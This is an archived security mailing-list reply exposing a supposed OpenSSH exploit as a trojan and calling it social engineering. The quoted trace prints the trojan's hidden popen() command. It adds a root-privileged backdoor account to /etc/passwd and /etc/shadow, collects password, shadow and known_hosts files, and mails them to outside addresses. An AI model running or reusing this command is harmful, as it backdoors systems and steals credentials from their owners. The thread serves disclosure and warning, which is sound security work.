lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <Pine.LNX.4.44.0309191138310.14924-100000@mailbox.prolocation.net>
From: raymond at prolocation.net (Raymond Dijkxhoorn)
Subject: Re: new openssh exploit in the wild! * is FAKE
 AS SH@!*

Hi!

> >> > i looked at this piece of exploit... it is binary so i'am not sure if 
> >> > this is a trojan or a backdoor or a virus. but i can't see anything 
> >> > strange while sniffing the exploit traffic. and i got root on serveral 
> >> > of my openbsd boxes with that. the bruteforcer seems to be very good. 

> which is obviously not true. Btw as far as I understand, the troyan code is triggered when 
> the "exploit" is run with the offset specified, and not in a "bruteforcing" mode.

He most likely means, he rooted some of hhis own boxes where he tired to 
run the 'exploit'. 

Nice piece of social engineering. 

> >> printf("[*] sending shellcode\n")= 22
> >> popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo
> >> "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999
> >> 9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd
> >> /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp;
> >> find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp 
|
> >> /usr/sbin/sendmail -f ownage_at_gmx.de
> >> m0nkeyhack_at_supermarkt.de) &> /dev/null ; rm -f /tmp/.tmp;", "r") =
> >> 0x0804a6b0

Bye,
Raymond.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ